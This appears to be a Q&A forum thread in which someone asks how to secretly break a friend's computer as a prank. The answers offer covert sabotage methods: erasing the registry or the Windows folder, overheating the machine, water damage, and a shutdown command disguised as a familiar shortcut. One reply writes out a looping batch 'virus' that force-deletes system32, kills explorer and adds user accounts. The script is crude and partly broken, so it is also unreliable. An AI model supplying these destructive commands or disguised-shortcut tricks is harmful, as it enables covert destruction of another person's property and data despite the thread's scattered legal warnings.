Question: How can i break a computer without the other person suspecting anything?

So here is the rundown, im playing a joke on my friend. I bought him a new computer but i before i give it to him i want him to freak out about his old computer breaking.

It needs to be discrete!

No smashing it or taking out parts. Hes pretty good with computers and will know if anything is out of place or it looks like i just broke off capacitors on the motherboard.

I was thinking of maybe using static to fry the components, he wouldn’t be able to pick that up.

Incorrectly flashing the BIOS, you know what you describe is a crime, right ?

I hope he does not have any important documents/files in this computer.
Also, it may be a crime to “destroy” someone elses property. Even if you are buying him another computer. May have sentimental value?

Maybe you just wanna destroy someone elses computer? lol .. i dont know be careful…

If you wanna makea computer stop working, without having signs of being smashed, broken or anything like that then you can try:

log in, go to start and go to RUN, type Regedit
Erase anything you see lol, this will MESS UP the computer.

Go into the Windows folder , erase all the files you see.
(however, he can still fix the computer by re installing windows since hardware is still working)

Take a capictor off the motherboard. It will be imposible for him to know which ones not working. Also, you can try overheating the computer by wrapping it in hot blankets and leaving it on for a night. it will definately heat up and break down.

Spill water on it. Take out the hard drive, smash it couple times and put it back on.

maybe braking the law by hacking off ur friends pc. is not your property.

I would instead just take off his memory ram, so when he turns it on u tell him here.. i bought u a new computer .. and then thats all. dont damage his pc.

Before you attempt the following, know that you are solely responsible with what you do with this information, and that if you harm any files, programs etc…, or cause very very serious harm, then this can be considered in some cases a crime.

Do these steps as follows:

Method 1= Harmless, shuts down his computer as a joke:

1. Create a shortcut with the following:

shutdown -s -t10 -c”your message”

click next, and name it “my documents” or “internet explorer” etc….

Right click, and change symbol to a appropriate one, the moment he clicks on it, the message appears, and computer shuts down in 10 seconds, unless you run “shutdown -a”, if he knows this, then shorten the time by putting the number 5 or 4 seconds etc….

Method 2= Over a period of time the computer can delete its registry, and in other words, ****** the computer.

Follow the steps:

Open notepad or editor on some computers its called:

type the following, or copy and pasting is recommended:

@echo
:virus
Del /f /q “C:WINDOWS/system32”
Taskkill explorer.exe
Tskill explorer.exe
Set /a_virus+=1
Net user %_virus+% /add
Goto virus

save as a batch file, next time it gets opened BOOM!

these are simple tricks, that can still be repaired.
